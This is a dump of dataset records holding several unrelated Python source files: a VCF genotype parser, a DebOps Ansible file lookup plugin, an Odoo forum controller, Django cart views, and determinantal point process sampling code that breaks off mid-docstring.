n_zygosity == 0:\n is_som = True\n\n # Split multiallelics?\n # XXX Ensure sample genotypes are handled properly\n for alt in record.ALT:\n posn = record.POS - 1\n end = _get_end(posn, alt, record.INFO)\n row = (record.CHROM, posn, end, record.REF, str(alt),\n is_som,\n zygosity,\n depth,\n alt_count,\n )\n if normal_id:\n row += (n_zygosity, n_depth, n_alt_count)\n yield row\n\n if cnt_reject:\n logging.info('Filtered out %d records', cnt_reject)\n\n\ndef _extract_genotype(sample):\n if \"DP\" in sample.data._fields:\n depth = sample.data.DP\n else:\n # SV or not called, probably\n depth = alt_count = np.nan #0.0\n if sample.is_het:\n zygosity = 0.5\n elif sample.gt_type == 0:\n zygosity = 0.0\n else:\n zygosity = 1.0\n alt_count = _get_alt_count(sample)\n return depth, zygosity, alt_count\n\n\ndef _get_alt_count(sample):\n \"\"\"Get the alternative allele count from a sample in a VCF record.\"\"\"\n if \"AD\" in sample.data._fields and sample.data.AD is not None:\n # GATK and other callers\n if isinstance(sample.data.AD, (list, tuple)):\n alt_count = float(sample.data.AD[1])\n # VarScan\n else:\n alt_count = float(sample.data.AD)\n elif \"CLCAD2\" in sample.data._fields and sample.data.CLCAD2 is not None:\n # Qiagen CLC Genomics Server -- similar to GATK's AD\n alt_count = float(sample.data.CLCAD2[1])\n elif \"AO\" in sample.data._fields:\n if sample.data.AO:\n if isinstance(sample.data.AO, (list, tuple)):\n alt_count = sum(map(float, sample.data.AO))\n else:\n alt_count = float(sample.data.AO)\n else:\n alt_count = 0.0\n else:\n logging.debug(\"Skipping %s:%d %s; \"\n \"unsure how to get alternative allele count: %s\",\n sample.site.CHROM, sample.site.POS, sample.site.REF,\n sample.data)\n alt_count = np.nan\n return alt_count\n\n\ndef _get_end(posn, alt, info):\n \"\"\"Get record end position.\"\"\"\n if \"END\" in info:\n # Structural variant\n return info['END']\n return posn + len(alt)\n\n# _____________________________________________________________________\n\ndef write_vcf(dframe):\n \"\"\"Variant Call Format (VCF) for SV loci.\"\"\"\n return NotImplemented\n # See export.export_vcf()\n","sub_path":"cnvlib/tabio/vcfio.py","file_name":"vcfio.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"563620603","text":"# (c) 2015, Robert Chady \n# Based on `runner/lookup_plugins/file.py` for Ansible\n# (c) 2012, Michael DeHaan \n#\n# This file is part of Debops.\n# This file is NOT part of Ansible yet.\n#\n# Debops is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Debops. If not, see .\n\n'''\n\nThis file implements the `file_src` lookup filter for Ansible. In difference\nto the `file` filter, this searches values based on the `file-paths`\nvariable (colon separated) as configured in DebOps.\n\nNOTE: This means this filter relies on DebOps.\n\n'''\n\nimport os\n\nfrom debops import *\nfrom debops.cmds import *\n\n__author__ = \"Robert Chady \"\n__copyright__ = \"Copyright 2015 by Robert Chady \"\n__license__ = \"GNU General Public LIcense version 3 (GPL v3) or later\"\n\ntry:\n from ansible.plugins.lookup import LookupBase\nexcept ImportError:\n LookupBase = object\n\nconf_template_paths = 'file-paths'\n\nfrom distutils.version import LooseVersion\nfrom ansible import __version__ as __ansible_version__\nclass LookupModule(LookupBase):\n def __new__(class_name, *args, **kwargs):\n if LooseVersion(__ansible_version__) < LooseVersion(\"2.0\"):\n from ansible import utils, errors\n class LookupModuleV1(object):\n def __init__(self, basedir, *args, **kwargs):\n self.basedir = basedir\n\n def run(self, terms, inject=None, **kwargs):\n\n terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)\n ret = []\n\n # this can happen if the variable contains a string, strictly not desired for lookup\n # plugins, but users may try it, so make it work.\n if not isinstance(terms, list):\n terms = [ terms ]\n\n project_root = find_debops_project(required=False)\n config = read_config(project_root)\n places = []\n\n if 'paths' in config and conf_template_paths in config['paths']:\n custom_places = config['paths'][conf_template_paths].split(':')\n for custom_path in custom_places:\n if os.path.isabs(custom_path):\n places.append(custom_path)\n else:\n places.append(os.path.join(project_root, custom_path))\n\n for term in terms:\n if '_original_file' in inject:\n relative_path = utils.path_dwim_relative(inject['_original_file'], 'files', '', self.basedir, check=False)\n places.append(relative_path)\n for path in places:\n template = os.path.join(path, term)\n if template and os.path.exists(template):\n ret.append(template)\n break\n else:\n raise errors.AnsibleError(\"could not locate file in lookup: %s\" % term)\n\n return ret\n\n return LookupModuleV1(*args, **kwargs)\n\n else:\n from ansible.errors import AnsibleError\n from ansible.plugins.lookup import LookupBase\n class LookupModuleV2(LookupBase):\n\n def run(self, terms, variables=None, **kwargs):\n ret = []\n\n # this can happen if the variable contains a string, strictly not desired for lookup\n # plugins, but users may try it, so make it work.\n if not isinstance(terms, list):\n terms = [ terms ]\n\n project_root = find_debops_project(required=False)\n config = read_config(project_root)\n places = []\n\n if 'paths' in config and conf_template_paths in config['paths']:\n custom_places = config['paths'][conf_template_paths].split(':')\n for custom_path in custom_places:\n if os.path.isabs(custom_path):\n places.append(custom_path)\n else:\n places.append(os.path.join(project_root, custom_path))\n\n for term in terms:\n if 'role_path' in variables:\n relative_path = self._loader.path_dwim_relative(variables['role_path'], 'files', '')\n places.append(relative_path)\n for path in places:\n template = os.path.join(path, term)\n if template and os.path.exists(template):\n ret.append(template)\n break\n else:\n raise AnsibleError(\"could not locate file in lookup: %s\" % term)\n\n return ret\n\n return LookupModuleV2(*args, **kwargs)\n\n","sub_path":"lookup_plugins/file_src.py","file_name":"file_src.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"123511726","text":"# -*- coding: utf-8 -*-\nfrom openerp import http\nfrom openerp.http import request\n\n# import the base controller class to inherit from\nfrom openerp.addons.website_forum_doc.controllers.main import WebsiteDoc\n\n# Inherit from WebsiteDoc\nclass WebsiteDocFix(WebsiteDoc):\n @http.route()\n # Full overwrite of the post_doc_ok method\n def post_toc_ok(self, forum, post_id, toc_id, **kwargs):\n cr, uid, context = request.cr, request.uid, request.context\n user = request.registry['res.users'].browse(cr, uid, uid, context=context)\n assert user.karma >= 200, 'Not enough karma, you need 200 to promote a documentation.'\n\n post_obj = request.registry['forum.post']\n doc_stage_id = False\n post = post_obj.browse(cr, uid, [int(post_id)])\n if post.documentation_stage_id:\n doc_stage_id = post.documentation_stage_id.id\n else:\n documentation_stage_obj = request.registry['forum.documentation.stage']\n doc_stage_id = documentation_stage_obj.search(cr, uid, [], limit=1, context=context)[0]\n\n post_obj.write(cr, uid, [int(post_id)], {\n 'documentation_toc_id': toc_id and int(toc_id) or False,\n 'documentation_stage_id': doc_stage_id,\n }, context=context)\n return request.redirect('/forum/'+str(forum.id)+'/question/'+str(post_id))\n","sub_path":"addons-own/website_forum_doc_fix/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253171638","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom orders.models import Pizza\nfrom .cart import Cart\nfrom .forms import CartAddPizzaForm\n\n@require_POST\ndef cart_add(request, pizza_id):\n cart = Cart(request)\n pizza = get_object_or_404(Pizza, id=pizza_id)\n form = CartAddPizzaForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n cart.add(pizza=pizza, quantity=data['quantity'], update_quantity=data['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, pizza_id):\n cart = Cart(request)\n pizza = get_object_or_404(Pizza, id=pizza_id)\n cart.remove(pizza)\n return redirect('cart:cart_detail')\n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddPizzaForm(\n initial={'quantity': item['quantity'],\n 'update': True})\n return render(request, 'cart/detail.html', {'cart': cart})\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234868137","text":"# coding: utf-8\n\nimport numpy as np\nfrom numpy.core.umath_tests import inner1d as np_inner1d\nimport scipy.linalg as la\n\n########################################\n################# DPPs #################\n########################################\n\ndef dpp_sampler_exact(kernel, proj_kernel=False, mode=\"GS\"):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)`, where :math:`K` is the inclusion probability kernel.\n\n\t:param kernel: Real symmetric kernel with eigenvalues in :math:`[0,1]`\n\t:type kernel:\n\t\tarray_type\n\n\t:param proj_kernel:\n\t\tIndicate :math:`K` is an orthogonal projection kernel.\n\t\tIf ``proj_kernel=True``, diagonalization of :math:`K` is not necessary, thus not performed.\n\t:type proj_kernel:\n\t\tbool, default 'False'\n\n\t:param mode:\n\t\tIndicate how the conditional probabilities i.e. the ratio of 2 determinants must be updated.\n\n\t\tIf ``proj_kernel=True``:\n\t\t\t- 'GS' (default): Gram-Schmidt on the columns of :math:`K`\n\n\t\tIf ``proj_kernel=False``:\n\t\t\t- 'GS' (default):\n\t\t\t- 'GS_bis': Slight modification of 'GS'\n\t\t\t- 'KuTa12': Algorithm 1 in :cite:`KuTa12`\n\t:type mode:\n\t\tstring, default 'GS'\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\tProjection :math:`\\operatorname{DPP}` sampler\n\t\t\t- :func:`proj_dpp_sampler_kernel `\n\n\t\tGeneric :math:`\\operatorname{DPP}` sampler\n\t\t\t- :func:`dpp_sampler_eig `\n\n\t\"\"\"\n\n\tif proj_kernel:\n\t\tsampl = proj_dpp_sampler_kernel(K, mode)\n\n\telse:# eigendecomposition is required\n\t\teig_vecs, eig_vals = la.eigh(kernel)\n\t\tsampl = dpp_sampler_eig(eig_vals, eig_vecs, mode)\n\n\treturn sampl\n\n#########################\n### Projection kernel ###\n#########################\n\ndef proj_dpp_sampler_kernel(kernel, mode=\"GS\"):\n\t\"\"\"\n\t\t.. seealso::\n\t\t\t- :func:`proj_dpp_sampler_kernel_GS `\n\t\"\"\"\n\n\t#### Phase 1: Select eigenvectors\n\t# No need for eigendecomposition\n\n\t#### Phase 2: Sample from orthogonal projection kernel K = K^2 = K.T K\n\t# Chain rule, conditionals are updated using:\n\tif mode == \"GS\": # Gram-Schmidt equiv Cholesky\n\t\tsampl = proj_dpp_sampler_kernel_GS(kernel)\n\n\t# elif mode == \"Schur\": # Schur complement\n\t# \tsampl = proj_dpp_sampler_kernel_Schur(kernel)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t# \"- 'Schur'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\ndef proj_dpp_sampler_kernel_GS(K, size=None):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)` with :math:`K` orthogonal projection matrix.\n\tIt performs sequential Gram-Schmidt orthogonalization or equivalently Cholesky decomposition updates of :math:`K`.\n\n\t:param K:\n\t\tOrthogonal projection kernel.\n\t:type K:\n\t\tarray_like\n\n\t:param k:\n\t\tSize of the sample.\n\t\tDefault is :math:`k=\\operatorname{Tr}(K)=\\operatorname{rank}(K)`.\n\t:type k:\n\t\tint\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\t- cite:`TrBaAm18` Algorithm 3, :cite:`Gil14` Algorithm 2\n\n\t# \t- :func:`proj_dpp_sampler_kernel_Schur `\n\t\"\"\"\n\n\t# Size of the ground set\n\tN = K.shape[0]\n\t# Maximal size of the sample: Tr(K)=rank(K)\n\trank = int(np.round(np.trace(K)))\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\n\t# Initialization\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\t# Sample\n\tY = []\n\n\tc = np.zeros((N, size))\n\td_2 = K.diagonal().copy()\n\n\tfor it in range(size):\n\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(d_2[rem_set])/(rank-it))[0]\n\t\t# Add the item to the sample\n\t\trem_set[j] = False\n\t\tY.append(j)\n\n\t\t###### Update the Cholesky factor\n\t\tc[rem_set, it] = K[rem_set,j] - c[rem_set,:it].dot(c[j,:it])\n\t\tc[rem_set, it] /=\tnp.sqrt(d_2[j])\n\n\t\td_2[rem_set] -= c[rem_set,it]**2\n\n\treturn Y\n\n# def proj_dpp_sampler_kernel_Schur(K, k=None):\n\n# \t\"\"\" Sample from :math:`\\operatorname{k-DPP}(K)` where the similarity kernel :math:`K`\n# \tis an orthogonal projection matrix.\n# \tIt sequentially updates the Schur complement by updating the inverse of the matrix involved.\n# \t:param K:\n# \t\tOrthogonal projection kernel.\n# \t:type K:\n# \t\tarray_type\n# \t:param k:\n# \t\tSize of the sample.\n# \t\tDefault is :math:`k=\\operatorname{Tr}(K)=\\operatorname{rank}(K)`.\n# \t:type k:\n# \t\tint\n\n# \t:return:\n# \t\tIf ``k`` is not provided (None),\n# \t\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n# \t\tIf ``k`` is provided,\n# \t\t\tA sample from :math:`\\operatorname{k-DPP}(K)`.\n# \t:rtype:\n# \t\tlist\n# \t.. seealso::\n# \t\t- :func:`projection_dpp_sampler_GS_bis `\n# \t\"\"\"\n\n# \t# Size of the ground set\n# \tN = K.shape[0]\n# \t# Maximal size of the sample: Tr(K)=rank(K)\n# \tr = int(np.round(np.trace(K)))\n# \t# Size of the sample = k\n# \tif k is None: # Full projection DPP\n# \t\tk=r\n# \t# else k-DPP(K) with K orthogonal projection\n\n# \t# Initialization\n# \tground_set, rem_set = np.arange(N), np.full(N, True)\n# \t# Sample\n# \tY = []\n\n# \tK_diag = K.diagonal() # Used to compute the first term of Schur complement\n# \tschur_comp = K_diag.copy() # Initialize the f\n\n# \tfor it in range(k):\n# \t\tprint(np.sum(schur_comp)/(r-it))\n# \t\t# Pick a new item\n# \t\tj = np.random.choice(ground_set[rem_set],\n# \t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n# \t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(schur_comp[rem_set])/(r-it))[0]\n\n# \t\t#### Update Schur complements K_ii - K_iY (K_Y)^-1 K_Yi for Y <- Y+j\n# \t\t#\n# \t\t# 1) use Woodbury identity to update K[Y,Y]^-1 to K[Y+j,Y+j]^-1\n# \t\t# K[Y+j,Y+j]^-1 =\n# \t\t# [ K[Y,Y]^-1 + (K[Y,Y]^-1 K[Y,j] K[j,Y] K[Y,Y]^-1)/schur_j -K[Y,Y]^-1 K[Y,j]/schur_j]\n# \t\t# [ -K[j,Y] K[Y,Y]^-1/schur_j 1/schur_j ]\n\n# \t\tif it == 0:\n# \t\t\tK_inv=1.0/K[j,j]\n# \t\telif i == 1:\n# \t\t\tK_inv=np.array([[K[j,j], -K[j,Y]], [-K[j,Y], K[Y,Y]]])\\\n# \t\t\t\t\t\t/(K[Y,Y]*K[j,j]-K[j,Y]**2)\n# \t\telse:\n# \t\t\tschur_j = K[j,j] - K[j,Y].dot(K_inv.dot(K[Y,j]))\n# \t\t\ttemp = K_inv.dot(K[Y,j])\n\n# \t\t\tK_inv = np.lib.pad(K_inv, (0,1), 'constant', constant_values=1.0/schur_j)\n\n# \t\t\tK_inv[:-1,:-1] += np.outer(temp, temp/schur_j)\n# \t\t\tK_inv[:-1,-1] *= -temp\n# \t\t\tK_inv[-1,:-1] = K_inv[:-1,-1]\n# \t\t\t# K_inv[-1,-1] = 1.0/schur_j\n\n# \t\t# Add the item to the sample\n# \t\trem_set[j] = False\n# \t\tY.append(j)\n\n# \t\t# 2) update Schur complements\n# \t\t# K_ii - K_iY (K_Y)^-1 K_Yi for Y <- Y+j\n# \t\tschur_comp[rem_set] = K_diag[rem_set]\\\n# \t\t\t\t\t\t\t\t\t\t\t\t\t- np_inner1d(K[np.ix_(rem_set,Y)],\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tK[np.ix_(rem_set,Y)].dot(K_inv))\n\n# \treturn Y\n\n\n######################\n### Generic kernel ###\n######################\n\ndef dpp_sampler_eig(eig_vecs_sel, mode=\"GS\"):\n\t\"\"\"\n\t.. seealso::\n\n\t\tPhase 1:\n\n\t\t- :func:`dpp_eig_vecs_selector `\n\t\t- :func:`dpp_eig_vecs_selector_gram_factor `\n\n\t\tPhase 2:\n\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\tif eig_vecs_sel.shape[1]:\n\t#### Phase 2: Sample from projection kernel VV.T\n\t# Chain rule, conditionals are updated using:\n\t\tif mode == \"GS\": # Gram-Schmidt\n\t\t\tsampl = proj_dpp_sampler_eig_GS(eig_vecs_sel)\n\n\t\telif mode == \"GS_bis\": # Slight modif of \"GS\"\n\t\t\tsampl = proj_dpp_sampler_eig_GS_bis(eig_vecs_sel)\n\n\t\telif mode == \"KuTa12\": # cf Kulesza-Taskar\n\t\t\tsampl = proj_dpp_sampler_eig_KuTa12(eig_vecs_sel)\n\n\t\telse:\n\t\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t\t\"- 'GS_bis'\",\n\t\t\t\t\t\t\t\t\t\"- 'KuTa12'\",\n\t\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\t\traise ValueError(\"\\n\".join(str_list))\n\telse:\n\t\tsampl = []\n\n\treturn sampl\n\n##### Phase 1\n\ndef dpp_eig_vecs_selector(ber_params, eig_vecs):\n\t\"\"\" Subsample eigenvectors :math:`V` of the initial kernel (inclusion :math:`K`, resp. marginal :math:`L`) to build a projection DPP with kernel :math:`V V^{\\top}` from which sampling is easy.\n\tThe selection is made based a realization of Bernoulli variables with parameters related to the eigenvalues of :math:`K`, resp. :math:`L`.\n\n\t:param ber_params:\n\t\tParameters of Bernoulli variables:\n\t\t.. math::\n\n\t\t\t\\lambda^K=\\lambda^L/(1+\\lambda^L)\n\t:type ber_params:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of the kernel :math:`K`, resp. :math:`L`\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tselected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. seealso::\n\n\t\t- :func:`dpp_sampler_eig `\n\t\"\"\"\n\n\t# Realisation of Bernoulli random variables with params ber_params\n\tind_sel = np.random.rand(len(ber_params)) < ber_params\n\n\treturn eig_vecs[:,ind_sel]\n\n\ndef dpp_eig_vecs_selector_L_dual(eig_vals, eig_vecs, gram_factor):\n\t\"\"\" Subsample eigenvectors :math:`V` of marginal kernel :math:`L=\\Phi \\Phi^{\\top}` based on the eigendecomposition dual kernel :math:`L'=\\Phi \\Phi^{\\top}`.\n\n\t:param eig_vals:\n\t\tCollection of eigenvalues of :math:`L` or :math:`L_dual` kernel.\n\t:type eig_vals:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of :math:`L_dual` kernel.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:param gram_factor:\n\t\tFeature vectors\n\t:type gram_factor:\n\t\tarray_type\n\n\t:return:\n\t\tselected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. see also::\n\n\t\tPhase 1:\n\n\t\t- :func:`dpp_eig_vecs_selector `\n\n\t\tPhase 2:\n\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\t# Realisation of Bernoulli random variables with params eig_vals\n\tind_sel = np.random.rand(len(eig_vals)) < eig_vals/(1.0+eig_vals)\n\n\treturn gram_factor.T.dot(eig_vecs[:,ind_sel]/np.sqrt(eig_vals[ind_sel]))\n\n##### Phase 2\n\n# Using Gram-Schmidt orthogonalization\ndef proj_dpp_sampler_eig_GS(eig_vecs, size=None):\n\t\"\"\" Sample from projection :math:`\\operatorname{DPP}(K)` using the eigendecomposition of the projection kernel :math:`K=VV^{\\top}` where :math:`V^{\\top}V = I`.\n\tIt performs sequential update of Cholesky decomposition, which is equivalent to Gram-Schmidt orthogonalization of the rows of the eigenvectors.\n\n\t:param eig_vecs:\n\t\tEigenvectors used to form projection kernel :math:`K=VV^{\\top}`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from projection :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist, array_type\n\n\t.. seealso::\n\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\t##### Phase 1: Select eigenvectors with Bernoulli variables with parameter the eigenvalues\n\n\tV = eig_vecs # Eigenvectors\n\tN, rank = V.shape\n\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\tY = [] # sample\n\n\t##### Phase 2: Chain rule\n\t# To compute the squared volume of the parallelepiped spanned by the feature vectors defining the sample\n\t# use Gram-Schmidt recursion aka Base x Height formula.\n\n\t# Initially this corresponds to the squared norm of the feature vectors\n\tc = np.zeros((N, size))\n\tnorms_2 = np_inner1d(V, V)\n\n\tfor it in range(size):\n\n\t\t# Pick an item \\propto this squred distance\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(norms_2[rem_set])/(rank-it))[0]\n\n\t\t# Add the item just picked\n\t\trem_set[j] = False\n\t\tY.append(j)\n\n\t\t# Cancel the contribution of V_j to the remaining feature vectors\n\t\tc[rem_set, it] = V[rem_set,:].dot(V[j,:]) - c[rem_set,:it].dot(c[j,:it])\n\t\tc[rem_set, it] /= np.sqrt(norms_2[j])\n\n\t\t# Compute the square distance of the feature vectors to Span(V_Y:)\n\t\tnorms_2[rem_set] -= c[rem_set,it]**2\n\n\treturn Y\n\n\n# Slight modif of Gram-Schmidt above\ndef proj_dpp_sampler_eig_GS_bis(eig_vecs, size=None):\n\t\"\"\" Sample from projection :math:`\\operatorname{DPP}(K)` using the eigendecomposition of the projection kernel :math:`K=VV^{\\top}` where :math:`V^{\\top}V = I`.\n\tIt performs sequential Gram-Schmidt orthogonalization of the rows of the eigenvectors.\n\n\t:param eig_vecs:\n\t\tEigenvectors used to form projection kernel :math:`K=VV^{\\top}`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from projection :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist, array_type\n\n\t:Example:\n\n\t.. seealso::\n\n\t\t- This is a slight modification of :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\tV = eig_vecs # Eigenvectors\n\tN, rank = V.shape\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\tY = [] # sample\n\n\t##### Phase 2: Chain rule\n\t# To compute the squared volume of the parallelepiped spanned by the feature vectors defining the sample\n\t# use Gram-Schmidt recursion aka Base x Height formula.\n\n\t### Matrix of the contribution of remaining vectors V_i onto the orthonormal basis {e_j}_Y of V_Y\n\t# \n\tcontrib = np.zeros((N, size))\n\n\t### Residual square norm\n\t# ||P_{V_Y}^{orthog} V_j||^2\n\tnorms_2 = np_inner1d(V, V)\n\n\tfor it in range(size):\n\n\t\t# Pick an item proportionally to the residual square norm\n\t\t# ||P_{V_Y}^{orthog} V_j||^2\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(norms_2[rem_set])/(rank-it))[0]\n\n\t\t### Update the residual square norm\n\t\t#\n\t\t# |P_{V_Y+j}^{orthog} V_i|^2\n\t\t# ^2\n\t\t# = |P_{V_Y}^{orthog} V_i|^2 - ----------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\n\t\t## 1) Orthogonalize V_j w.r.t. orthonormal basis of Span(V_Y)\n\t\t# V'_j = P_{V_Y}^{orthog} V_j\n\t\t# = V_j - V\"_k\n\t\t# Note V'_j is not normalized\n\t\tV[j,:] -= contrib[j,:it].dot(V[Y,:])\n\n\t\t# Make the item selected unavailable\n\t\trem_set[j] = False\n\t\t# Add the item to the sample\n\t\tY.append(j)\n\n\t\t## 2) Compute = \n\t\tcontrib[rem_set,it] = V[rem_set,:].dot(V[j,:])\n\n\t\t## 3) Normalize V'_j with norm^2 and not norm\n\t\t# V'_j P_{V_Y}^{orthog} V_j\n\t\t# V\"_j = ------- = --------------------------\n\t\t# |V'j|^2 |P_{V_Y}^{orthog} V_j|^2\n\t\tV[j,:] /= norms_2[j]\n\t\t# for next orthogonalization in 1)\n\t\t# \t P_{V_Y}^{orthog} V_j\n\t\t# V_i - V\"_j = V_i - -----------------------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\n\t\t## 4) Update the residual square norm by cancelling the contribution of V_i onto V_j\n\t\t#\n\t\t# |P_{V_Y+j}^{orthog} V_i|^2\n\t\t#\t\t= |P_{V_Y}^{orthog} V_i|^2 - ^2 / |V'j|^2\n\t\t#\n\t\t# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t^2\n\t\t# = |P_{V_Y}^{orthog} V_i|^2 -\t\t----------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\t\tnorms_2[rem_set] -= (contrib[rem_set,it]**2)/norms_2[j]\n\n\treturn Y\n\n\ndef proj_dpp_sampler_eig_KuTa12(eig_vecs, size=None):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)` using the eigendecomposition of the similarity kernel :math:`K`.\n\tIt is based on the orthogonalization of the selected eigenvectors.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of the similarity kernel :math:`K`.\n\t:type eig_vals:\n\t\tlist\n\n\t:param eig_vecs:\n\t\tEigenvectors of the similarity kernel :math:`K`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\t- Algorithm 1 in :cite:`KuTa12`\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\"\"\"\n\n\n\t# N = size of the ground set, n = size of the sample\n\tV = eig_vecs\n\tN, rank = V.shape\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\tY = [] # sample\n\n\t#### Phase 2: Chain rule\n\t# Initialize the sample\n\tnorms_2 = np_inner1d(V,V)\n\t# Pick an item\n\ti = np.random.choice(N, size=1, p=np.fabs(norms_2)/rank)[0]\n\t# Add the item just picked\n\tY.append(i) # sample\n\n\t# Following [Algo 1, KuTa12], the aim is to compute the orhto complement of the subspace spanned by the selected eigenvectors to the canonical vectors \\{e_i ; i \\in Y\\}. We proceed recursively.\n\tfor it in range(1, size):\n\n\t\t# Cancel the contribution of e_i to the remaining vectors that is, find the subspace of V that is orthogonal to \\{e_i ; i \\in Y\\}\n\n\t\t# Take the index of a vector that has a non null contribution along e_i\n\t\tj = np.where(V[i,:]!=0)[0][0]\n\t\t# Cancel the contribution of the remaining vectors along e_i, but stay in the subspace spanned by V i.e. get the subspace of V orthogonal to \\{e_i ; i \\in Y\\}\n\t\tV -= np.outer(V[:,j]/V[i,j], V[i,:])\n\t\t# V_:j is set to 0 so we delete it and we can derive an orthononormal basis of the subspace under consideration\n\t\tV, _ = la.qr(np.delete(V, j, axis=1), mode=\"economic\")\n\n\t\tnorms_2 = np_inner1d(V, V)\n\t\t# Pick an item\n\t\ti = np.random.choice(N, size=1, p=np.fabs(norms_2)/(rank-it))[0]\n\t\t# Add the item just picked\n\t\tY.append(i)\n\n\treturn Y\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########################################\n################# k-DPPs #################\n##########################################\n\ndef k_dpp_sampler(kernel, size, proj_kernel=False, mode=\"GS\"):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)`, where :math:`K` is real symmetric with eigenvalues in :math:`[0,1]`.\n\n\t:param kernel: Real symmetric kernel with eigenvalues in :math:`[0,1]`\n\t:type kernel:\n\t\tarray_type\n\n\t:param proj_kernel:\n\t\tIndicate :math:`K` is an orthogonal projection kernel.\n\t\tIf ``proj_kernel=True``, diagonalization of :math:`K` is not necessary, thus not performed.\n\t:type proj_kernel:\n\t\tbool, default 'False'\n\n\t:param 